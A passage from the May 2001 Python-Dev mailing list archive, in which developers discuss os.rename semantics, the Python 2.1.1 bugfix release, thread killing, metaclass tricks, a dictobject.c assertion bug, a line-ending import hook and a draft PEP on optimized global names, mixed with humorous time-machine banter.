so folks don't think they've discovered a bug in Python. Or maybe we could do this: in the main text, explain and show *that* it happens, and refer to the appendix which can explain *why* it happens to those interested, in a gentle manner like what Tim already wrote. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 15:52:02 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:52:02 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200." References: Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com> > May I suggest to add an optional third boolean parameter to > os.rename called 'replace', which defaults either to TRUE or FALSE, > so modifying existing apps will become even less hassle to potential > porters. I see no reason to change the API. In any case, for backwards compatibility, the default would have to be platform dependent, which strikes me as just as bad as the current situation. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas at xs4all.net Wed May 23 16:00:25 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 16:00:25 +0200 Subject: [Python-Dev] Python 2.1.1 Message-ID: <20010523160025.B690@xs4all.nl> As those of you on python-checkins might have noticed ;) I started checking in Python 2.1.1 bufixes. I'd hoped to finish all of my backlog today, but unfortuantely I'm now called away on a suprise emergency meeting, so I'm not sure if I'll make it. The 2.1.1 tree is sort of an unstable state right now, I'll fix that today in any case, but after the meeting. (As for why I started doing it: I just spent about two weeks of digging through Pine sourcecode, and its imap server in particular, and I decided I deserved a break -- Python reads like a Heinlein novel, after pine code: readable, straight-forward, and just enough complexity to keep it entertaining :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From aahz at rahul.net Wed May 23 16:08:45 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 07:08:45 -0700 (PDT) Subject: [Python-Dev] Killing threads Message-ID: <20010523140845.B092299C83@waltz.rahul.net> Okay, so we all know it isn't possible to kill threads cleanly and safely in any kind of cross-platform way. At the same time, a program that has a thread running haywire should be able to kill itself completely, so that a monitoring process can restart it. How hard would it be to do only that in a cross-platform way? I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No clue what would need to happen for Windows and Mac. (This got brought up because I experimented with os._exit() as a possible solution, but that GPFs on Win98SE.) -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From thomas.heller at ion-tof.com Wed May 23 19:28:07 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 19:28:07 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> [this message has also been posted to comp.lang.python] Guido's metaclass hook in Python goes this way: If a base class (let's better call it a 'base object') has a __class__ attribute, this is called to create the new class. From guido at digicool.com Wed May 23 20:02:06 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 14:02:06 -0400 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200." <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> Message-ID: <200105231802.f4NI26408784@odiug.digicool.com> > [this message has also been posted to comp.lang.python] [And I'm cc'ing there] > Guido's metaclass hook in Python goes this way: > > If a base class (let's better call it a 'base object') > has a __class__ attribute, this is called to create the > new class. > > >From demo/metaclasses/index.html: > > class C(B): > a = 1 > b = 2 > > Assuming B has a __class__ attribute, this translates into: > > C = B.__class__('C', (B,), {'a': 1, 'b': 2}) Yes. > Usually B is an instance of a normal class. No, B should behave like a class, which makes it an instance of a metaclass. > So the above code will create an instance of B, > call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2}, > and assign the instance of B to the variable C. No, it will not create an instance of B. It will create an instance of B.__class__, which is a subclass of B. The difference between subclassing and instantiation is confusing, but crucial, when talking about metaclasses! See the ASCII art in my classic post to the types-sig: http://mail.python.org/pipermail/types-sig/1998-November/000084.html > I've ever since played with this metaclass hook, and > always found the problem that B would have to completely > simulate the normal python behaviour for classes (modifying > of course what you want to change). > > The problem is that there are a lot of successful and > unsucessful attribute lookups, which require a lot > of overhead when implemented in Python: So the result > is very slow (too slow to be usable in some cases). Yes. You should be able to subclass an existing metaclass! Fortunately, in the descr-branch code in CVS, this is possible. I haven't explored it much yet, but it should be possible to do things like: Integer = type(0) Class = Integer.__class__ # same as type(Integer) class MyClass(Class): ... MyObject = MyClass("MyObject", (), {}) myInstance = MyObject() Here MyClass declares a metaclass, and MyObject is a regular class that uses MyClass for its metaclass. Then, myInstance is an instance of MyObject. See the end of PEP 252 for info on getting the descr-branch code (http://python.sourceforge.net/peps/pep-0252.html). > ------ > > Python 2.1 allows to attach attributes to function objects, > so a new metaclass pattern can be implemented. > > The idea is to let B be a function having a __class__ attribute > (which does _not_ have to be a class, it can again be a function). Oh, yuck. I suppose this is fine if you want to experiment with metaclasses in 2.1, but please consider using the descr-branch code instead so you can see what 2.2 will be like! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 23 20:40:58 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 23 May 2001 20:40:58 +0200 Subject: [Python-Dev] Daily Python URL on your Palm Message-ID: <3B0C043A.D5C9C604@lemburg.com> Just thought you might want to know that Fredrik's Daily Python URL can be downloaded onto the Palm as Avantgo Channel. Here's the URL for adding the channel: http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00 PS: Would be nice if Fredrik could provide a "printable" version of the Daily URL page, since the table layout doesn't work too well on the small Palm display. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 23 20:57:28 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 20:57:28 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> <200105231802.f4NI26408784@odiug.digicool.com> Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook> Let me try again (and please forgive my mistakes in the detail). The usual way (as in demo\metaclasses): class B_Meta: .... B = B_Meta('B', (), {}) class C(B): pass B is an instance of the (meta)class B_Meta. C is now another instance of the same (meta)class. because B.__class__, which is the (meta)class itself, is called, and returns a new instance. B_Meta can (and must) implement a lot of behaviour. In contrast, with my recipe: def MagicFunction(name, bases, dict): ...construct a class on the fly... ...create an instance of this class... return aninstance_of_a_class def B_Meta(): pass B_Meta.__class__ = MagicFunction class C(B): pass Now C is an_instance_of_a_class (which is an instance of a normal python class), and thus does inherit the normal behaviour of Python classes. Thomas PS: I'm sure this all will be much better in descr-branch. I've checked it out and am playing with it from time to time, but most of the time I have to use released Python versions. From tim.one at home.com Wed May 23 21:32:59 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 15:32:59 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523160025.B690@xs4all.nl> Message-ID: [Thomas Wouters] > > As those of you on python-checkins might have noticed ;) I started > checking in Python 2.1.1 bufixes. And bless you for it, Thomas! > I'd hoped to finish all of my backlog today, but unfortuantely I'm > now called away on a suprise emergency meeting, Now that sucks. Tell your manager that you'll only attend planned emergency meetings from now on: Guido plans Python crises years in advance, and it shows in the relative cleanliness of the Python codebase . From nas at python.ca Wed May 23 21:41:14 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 23 May 2001 12:41:14 -0700 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010523124114.A4747@glacier.fnational.com> Tim Peters wrote: > Guido plans Python crises years in advance, and it shows in the > relative cleanliness of the Python codebase . I don't think Thomas has a time machine. Neil From tim.one at home.com Wed May 23 21:45:06 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 15:45:06 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net> Message-ID: [Aahz] > Okay, so we all know it isn't possible to kill threads cleanly and > safely in any kind of cross-platform way. At the same time, a program > that has a thread running haywire should be able to kill itself > completely, so that a monitoring process can restart it. How hard would > it be to do only that in a cross-platform way? Since Python is written in C, and C says nothing about this, you need a platform expert for each platform covered by "cross" . > I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No > clue what would need to happen for Windows and Mac. > > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) Please open a bug report on that, then, with a tiny test case if possible. This worked fine on Win98SE for me just now: import thread, os, time def task(): while 1: print "x", time.sleep(.1) for i in range(10): thread.start_new_thread(task, ()) time.sleep(5) os._exit(1) Windows kills all threads spawned by a process when "the main thread" exits. You don't need to do os._exit(), and sys.exit() is normally a much better idea (else, e.g., stdio buffers may not get flushed to disk). From thomas at xs4all.net Wed May 23 22:27:51 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 22:27:51 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> Message-ID: <20010523222751.G690@xs4all.nl> On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote: > Tim Peters wrote: > > Guido plans Python crises years in advance, and it shows in the > > relative cleanliness of the Python codebase . > > I don't think Thomas has a time machine. *Don't* get me started on that. If only Guido would stop hogging the damned thing, I could be a 34-year-old millionaire in a 10-room house and 8 girlfriends ! Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Wed May 23 22:32:04 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 16:32:04 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl> Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. You wouldn't happen to have a reproducible test case? That hash==8 is almost certainly a red herring -- or a sign of wild stores . > Going back to revision 2.90 fixes the problem (or masks it). Instead of: assert(mp->ma_fill < mp->ma_size); this code used to be: if (mp->ma_fill >= mp->ma_size) { /* No room for a new key. * This only happens when the dict is empty. * Let dictresize() create a minimal dict. */ assert(mp->ma_used == 0); if (dictresize(mp, 0) != 0) return -1; assert(mp->ma_fill < mp->ma_size); } so the dict would get resized whenever ma_fill >= ma_size, although the code only *expected* that to happen when the dict table was NULL. It was perhaps happening in other cases too. The dict is never empty (NULL) after the patch, so the special case for "empty" got replaced by an assert. Offhand I don't see how this could be triggering -- although *something* about the 2.90 logic makes me uneasy! Ah, mp->ma_fill >= mp->ma_size wasn't a correct test: filled slots that aren't used slots don't stop a new key from being added. Assuming that's it, 2.90 could do needless calls to dictresize, but the new version does a bogus assert instead. So replace the current version's offending assert(mp->ma_fill < mp->ma_size); with assert(mp->ma_used < mp->ma_size); Let me know whether that solves it. 2.90 may also suffer a bogus assert(mp->ma_used == 0); failure. It's not easy to provoke any of this, though (requires exactly the right sequence of mixed inserts and deletes, with hash codes hitting exactly the right dict slots). From barry at digicool.com Wed May 23 22:52:22 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 16:52:22 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> Message-ID: <15116.8966.324136.897953@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> *Don't* get me started on that. If only Guido would stop TW> hogging the damned thing, I could be a 34-year-old millionaire TW> in a 10-room house and 8 girlfriends ! It's really not as easy as all that, though. When Guido's not around, I've been known to, er, take The Machine for a spin (sshh! Do /not/ tell him!). The first time I did, I didn't realize that the blue toggle had to be in the down position, and when I stepped out, everybody was speaking Esperanto, had half their heads shaved, and were toting around what looked like a cross between a dog and a beach ball (it drooled incessantly). Fortunately, The Machine has a reset button (oddly labeled "History Erase Button" and guarded by a candy-crazed TV announcer-like automaton who must be coaxed from the button with a marshmallow s'more). The second time I used it, I'd forgotten that you must keep your left hand on the silver sphere while you line up the parallel lines with the lip-actuated alpha wheel. Silly me, I'd removed my left hand just before alignment in order to twist the fluroscopic reflection tube a quarter rotation out of phase (rule of thumb: never listen to that automaton when he's licked the last of the chocolate-y goo from his fingers. He'll say anything to get another s'more.) You really don't want to know what that particular world looked like, but let's just say it involved lots and lots of angry elephants. So now I leave well enough alone, and I've learned that if you really want to change the past, just wait for Guido to use it for his own nefarious purposes, and tape a sign to his back requesting the (very modest) change to the continuum that you're looking for. And don't forget to smear the front of that sign with s'more. -Barry From tim.one at home.com Wed May 23 23:02:17 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 17:02:17 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. [Tim] > You wouldn't happen to have a reproducible test case? Nevermind; I do: d = {} for i in range(5): d[i] = i for i in range(5): del d[i] for i in range(5, 9): # assert triggers when i == 8 d[i] = i The cure is more complicated than I described, though. From esr at thyrsus.com Thu May 24 00:39:49 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 18:39:49 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523183949.A19251@thyrsus.com> Barry A. Warsaw : > You really don't want to know what that particular world looked like, > but let's just say it involved lots and lots of angry elephants. You've been *there*? Dang...that's the timeline that scared me into hanging up my lab coat. It was a slow Saturday and I was hatching Sinister Plan For World Domination number 4. What happened to the other three? Well...I had been planning to terrorize the western U.S with a giant mechanical spider, until some guys from Hollywood offered me way too much money for it. The trained army of radioactive gorillas I spent the movie money on didn't work out -- my Igor flatly refused to shovel any more radioactive gorilla poop, and you know how hard it is to get good help these days. Blackmailing major cities with a Zeppelin-mounted death ray projector sounded cool but Radio Shack was out of the parts. OK, so plan #4 was to create voracious mega-amoebas using my Ionic Mutatron and send them out to destroy all my enemies, especially that kid who beat me up in third grade. There I was, cackling insanely, just about to unleash these slimy horrors on an unsuspecting world to wreak havoc and destruction, when the eka-rhodium electrodes on the Mutatron arced over. This produced a wild spike of temporokinetic energy, and guess where *I* was standing? Silly me. Before you could say "plot complication" I was materializing in the Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself, as it turned out, who was getting wound up to try out his newest human-goad on a mahout they had just captured from the Fortified Cities. The mahout was terrified out of his wits, and you would have been too if you'd seen what the High Pachyderm's tusks were covered with and the lascivious way his trunk was curled around that cheese grater. Euggghhh... It was crazy. The High Pachyderm was trumpeting like mad, tuskers charging at me from all directions, and me with at least 5.23 seconds to go until the temporokinetic charge wore off. Fortunately I remembered that elephants communicate using modulated infrasonics that they hear with the flat part of their foreheads, and I had my trusty sonic screwdriver on me. I set it to "infra" at maximum volume and hurled it at the High Pachyderm -- hit the bugger right in the tiara. He went berserk and his confused guards started crashing into each other left and right, which was a pretty impressive sight since the smallest of them weighed over two and a half tons. It was touch and go there, let me tell you. I caught one glimpse of the mahout's rapidly-retreating heels just as the charge wore off and I was slingshotted back to my lab. My sonic screwdriver, of course, followed within seconds -- horribly crushed and mangled. And that's when I swore off building fiendish devices. Electrocution I can laugh at, having my monstrous creations turn on me is all in a day's work, and that one time I was accidentally transformed into a fly I found some truly remarkable uses for a three-foot-long prehensile tongue. But what the High Pachyderm had planned was too twisted even for *me*. I decided Sinister Plan #5 would have to be a bit less hardware-intensive, if only as a rest for my frazzled nerves. So I spent the last juice in the batteries on the orbital mind-control lasers (long story) to implant some subtle suggestions in a few minds at Netscape and IBM and elsewhere, and started hitting the conference circuit pretty heavy. What suggestions? Oh, nothing important. Nothing at all...BWAHAHAHAHA!!! -- Eric S. Raymond Sometimes the law defends plunder and participates in it. Sometimes the law places the whole apparatus of judges, police, prisons and gendarmes at the service of the plunderers, and treats the victim -- when he defends himself -- as a criminal. -- Frederic Bastiat, "The Law" From gward at python.net Thu May 24 01:48:10 2001 From: gward at python.net (Greg Ward) Date: Wed, 23 May 2001 19:48:10 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523194810.A9947@gerg.ca> On 23 May 2001, Barry A. Warsaw said: > The second time I used it, I'd forgotten that you must keep your left > hand on the silver sphere while you line up the parallel lines with > the lip-actuated alpha wheel. What? You mean Guido's time machine was really designed by Larry Wall? Oh, the irony... Greg -- Greg Ward - Python bigot gward at python.net http://starship.python.net/~gward/ If you can read this, thank a programmer. From dgoodger at bigfoot.com Thu May 24 03:04:46 2001 From: dgoodger at bigfoot.com (David Goodger) Date: Wed, 23 May 2001 21:04:46 -0400 Subject: [Python-Dev] Re: Import hook to do end-of-line conversion? In-Reply-To: <3B0AF45D.732126E6@home.net> Message-ID: Yesterday I found I had need for an end-of-line conversion import hook. I looked sround but found none (did I miss some code on this thread?), so I whipped one up (below). It seems to do the job. If you see any goofs, gaffes or gotchas, or if you know of a better way to do this, please let me know. I will post this code to c.l.py in a few days for the enjoyment of all. -- David Goodger dgoodger at bigfoot.com Open-source projects: - The Go Tools Project: http://gotools.sourceforge.net - reStructuredText: http://structuredtext.sourceforge.net (soon!) -----%<----------cut----------%<----------%<----------cut----------%<----- # Import hook for end-of-line conversion, # by David Goodger (dgoodger at bigfoot.com). # Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to # import Python modules with any of Unix, Mac, or Windows line endings. import ihooks, imp, py_compile class MyHooks(ihooks.Hooks): def load_source(self, name, filename, file=None): """Compile source files with any line ending.""" if file: file.close() py_compile.compile(filename) # line ending conversion is in here cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb') try: return self.load_compiled(name, filename, cfile) finally: cfile.close() class MyModuleLoader(ihooks.ModuleLoader): def load_module(self, name, stuff): """Special-case package directory imports.""" file, filename, (suff, mode, type) = stuff path = None if type == imp.PKG_DIRECTORY: stuff = self.find_module_in_dir("__init__", filename, 0) file = stuff[0] # package/__init__.py path = [filename] try: # let superclass handle the rest module = ihooks.ModuleLoader.load_module(self, name, stuff) finally: if file: file.close() if path: module.__path__ = path # necessary for pkg.module imports return module ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install() From jeremy at alum.mit.edu Thu May 24 03:10:55 2001 From: jeremy at alum.mit.edu (Jeremy Hylton) Date: Wed, 23 May 2001 21:10:55 -0400 (EDT) Subject: [Python-Dev] pre-PEP on optimized global names Message-ID: <200105240110.VAA09078@newman.concentric.net> I've been hoping to work on optimized global and builtin name support for Python 2.2. I'm not sure if I'll have time, but thought I'd circulate a draft with some notes on the subject now. Anyone interested in this work? Jeremy PEP: ??? Title: Optimized Access to Module and Builtin Names Author: jeremy at digicool.com (Jeremy Hylton) Status: Draft Type: Standards Track Python-Version: 2.2 Created: 23-May-2001 Abstract This PEP proposes a new implementation of global module namespaces and the builtin namespace that speeds name resolution. The implementation would use an array of object pointers for most operations in these namespaces. The compiler would assign indices for global variables at compile time. The current implementation represents these namespaces as dictionaries. A global name incurs a dictionary lookup each time it is used; a builtin name incurs two dictionary lookups, a failed lookup in the global namespace and a second lookup in the builtin namespace. This implementation should speed Python code that uses module-level functions and variables. It should also eliminate awkward coding styles that have evolved to speed access to these names. The implementation is complicated because the global and builtin namespaces can be modified dynamically in ways that are impossible for the compiler to detect. (Example: A module's namespace is modified by a script after the module is imported.) As a result, the implementation must maintain several auxillary data structures to preserve these dynamic features. Introduction [expand on the basic ideas in the abstract] [describe the key parts of the design: dlict, compiler support, stupid name trick workarounds, optimization of other module's globals] DLict design The namespaces are implemented using a data structure that has sometimes gone under the name dlict. It is a dictionary that has numbered slots for some dictionary entries. The type must be implemented in C to achieve acceptable performance. A Python implementation is included here to explain the basic design: """A dictionary-list hybrid""" import types class DLict: def __init__(self, names): assert isinstance(names, types.DictType) self.names = {} self.list = [None] * size self.empty = [1] * size self.dict = {} self.size = 0 def __getitem__(self, name): i = self.names.get(name) if i is None: return self.dict[name] if self.empty[i] is not None: raise KeyError, name return self.list[i] def __setitem__(self, name, val): i = self.names.get(name) if i is None: self.dict[name] = val else: self.empty[i] = None self.list[i] = val self.size += 1 def __delitem__(self, name): i = self.names.get(name) if i is None: del self.dict[name] else: if self.empty[i] is not None: raise KeyError, name self.empty[i] = 1 self.list[i] = None self.size -= 1 def keys(self): if self.dict: return self.names.keys() + self.dict.keys() else: return self.names.keys() def values(self): if self.dict: return self.names.values() + self.dict.values() else: return self.names.values() def items(self): if self.dict: return self.names.items() else: return self.names.items() + self.dict.items() def __len__(self): return self.size + len(self.dict) def __cmp__(self, dlict): c = cmp(self.names, dlict.names) if c != 0: return c c = cmp(self.size, dlict.size) if c != 0: return c for i in range(len(self.names)): c = cmp(self.empty[i], dlict.empty[i]) if c != 0: return c if self.empty[i] is None: c = cmp(self.list[i], dlict.empty[i]) if c != 0: return c return cmp(self.dict, dlict.dict) def clear(self): self.dict.clear() for i in range(len(self.names)): if self.empty[i] is None: self.empty[i] = 1 self.list[i] = None def update(self): pass def load(self, index): """dlict-special method to support indexed access""" if self.empty[index] is None: return self.list[index] else: raise KeyError, index # XXX might want reverse mapping def store(self, index, val): """dlict-special method to support indexed access""" self.empty[index] = None self.list[index] = val def delete(self, index): """dlict-special method to support indexed access""" self.empty[index] = 1 self.list[index] = None Compiler issues The compiler currently collects the names of all global variables in a module. These are names bound at the module level or bound in a class or function body that declares them to be global. The compiler would assign indices for each global name and add the names and indices of the globals to the module's code object. Each code object would then be bound irrevocably to the module it was defined in. (Not sure if there are some subtle problems with this.) Enhancement: Optimized access to other module's globals If one module imports another and binds a name in the global namespace, the compiler currently detects that the particular global is bound to a module. The compiler also note access to any attribute of a module, and emit special opcodes for accessing these names. At runtime the implementation can lookup the index of the module attribute in the module's namespace. In the current namespace, a pointer to the foreign module's dlict can be recorded along with the name's offset in the dlict. This would allow names, e.g. types.StringType, to be used with the same efficiency as globals. Backwards compatibility The dlict will need to maintain metainformation about whether a slot is currently used or not. It will also need to maintain a pointer to the builtin namespace. When a name is not currently used in the global namespace, the lookup will have to fail over to the builtin namespace. In the reverse case, each module may need a special accessor function for the builtin namespace that checks to see if a global shadowing the builtin has been added dynamically. This check would only occur if there was a dynamic change to the module's dlict, i.e. when a name is bound that wasn't discovered at compile-time. These mechanisms would have little if any cost for the common case whether a module's global namespace is not modified in strange ways at runtime. They would add overhead for modules that did unusual things with global names, but this is an uncommon practice and probably one worth discouraging. It may be desirable to disable dynamic additions to the global namespace in some future version of Python. If so, the new implementation could provide warnings. Local Variables: mode: indented-text indent-tabs-mode: nil End: From barry at digicool.com Thu May 24 04:46:30 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 22:46:30 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> Message-ID: <15116.30214.900667.624573@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Before you could say "plot complication" I was materializing ESR> in the Hyraxeum -- damn near nose-to-trunk with the High ESR> Pachyderm himself, as it turned out, who was getting wound up ESR> to try out his newest human-goad on a mahout they had just ESR> captured from the Fortified Cities. That big self-important elephant wasn't named Puffy the Frog by any chance, was he? Did he taste vaguely lemony? If so, he's got a lot of nerve calling himself the "High Pachyderm"! Quite a lofty title for one who's skin is stretched to just this side of its tensile breaking point. Sure, I know ol' Puffy, had a few binges with the old goat myself. You just don't want to be near him when the stray micro-meteor happens to pierce his dermis. Much, MUCH messier than eight crates of cornbob filled to the brim with radioactive gorilla poop, I can assure you! now-where'd-i-leave-my-medication?-ly y'rs, -Barry From esr at thyrsus.com Thu May 24 05:04:58 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:04:58 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> Message-ID: <20010523230458.A28895@thyrsus.com> Barry A. Warsaw : > That big self-important elephant wasn't named Puffy the Frog by any > chance, was he? Did he taste vaguely lemony? If so, he's got a lot > of nerve calling himself the "High Pachyderm"! Quite a lofty title > for one who's skin is stretched to just this side of its tensile > breaking point. Congratulations, Barry. I googled for "Puffy the Frog" and found a page that...explained...this. It was the #1 hit. Apparently the Universe is an even more random place than I thought. -- Eric S. Raymond If I were to select a jack-booted group of fascists who are perhaps as large a danger to American society as I could pick today, I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms]. -- U.S. Representative John Dingell, 1980 From barry at digicool.com Thu May 24 05:14:07 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 23:14:07 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> Message-ID: <15116.31871.122265.883855@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Congratulations, Barry. I googled for "Puffy the Frog" and ESR> found a page that...explained...this. It was the #1 hit. Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass singer in the Atlanta-based band "The Shrinking of George". What you found is no doubt the lyrics to that song, which topped the pop charts briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact), displacing the Beatles "I Wanna Hold Your Head" before being itself displaced by the The Bee Gee's "Booger Feever" [sic]. Sadly, even Napster doesn't have the mp3's and all Dad's old records are scratched beyond hope. ESR> Apparently the Universe is an even more random place than I ESR> thought. here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, -Barry From esr at thyrsus.com Thu May 24 05:31:42 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:31:42 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org> Message-ID: <20010523233142.A29023@thyrsus.com> Barry A. Warsaw : > Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass > singer in the Atlanta-based band "The Shrinking of George". I suppose it's not a coincidence that it's Fernando Poo day today. Of course it's not a coincidence. There are no coincidences anywhere. Fnord. -- Eric S. Raymond Sometimes it is said that man cannot be trusted with the government of himself. Can he, then, be trusted with the government of others? -- Thomas Jefferson, in his 1801 inaugural address From aahz at rahul.net Thu May 24 06:59:37 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 21:59:37 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 23, 2001 03:45:06 PM Message-ID: <20010524045938.5228199C83@waltz.rahul.net> Tim Peters wrote: > [Aahz] >> >> (This got brought up because I experimented with os._exit() as a >> possible solution, but that GPFs on Win98SE.) > > Please open a bug report on that, then, with a tiny test case if possible. > This worked fine on Win98SE for me just now: Futz. *Now* it works. Chalk it up to another unreproducible bug caused by an unstable Win98. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From gstein at lyra.org Thu May 24 10:33:49 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:33:49 -0700 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82 